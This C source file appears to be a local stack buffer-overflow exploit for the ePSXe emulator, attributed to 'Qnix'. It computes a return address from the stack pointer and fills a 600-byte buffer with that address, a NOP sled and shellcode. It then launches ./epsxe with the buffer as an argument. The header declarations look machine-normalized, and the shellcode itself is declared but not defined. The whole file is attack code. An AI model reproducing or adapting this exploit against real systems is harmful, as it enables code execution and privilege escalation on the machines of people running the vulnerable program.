
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int execl (char*,char*,char*,char*,int ) ;
 int free (char*) ;
 char* malloc (int) ;
 int printf (char*,...) ;
 int * shellcode ;
 long sp () ;
 int strlen (int *) ;

int main(int argc, char *argv[])
{
   int i, offset;
   long esp, ret, *addr_ptr;
   char *buffer, *ptr;

   offset = 0;
   esp = sp();
   ret = esp - offset;

printf("\n ************************************* \n");
printf("      ePSXe v1.* local exploit          \n");
printf("                 by                  \n");
printf("   Qnix  | Q-nix[at]hotmail[dot]com   ");
printf("\n ************************************* \n\n");
printf("[~] Stack pointer (ESP) : 0x%x\n", esp);
printf("[~] Offset from ESP     : 0x%x\n", offset);
printf("[~] Desired Return Addr : 0x%x\n\n", ret);

buffer = malloc(600);

ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }

for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }

ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }

buffer[600-1] = 0;

execl("./epsxe", "epsxe", "-nogui", buffer, 0);

free(buffer);

   return 0;
}
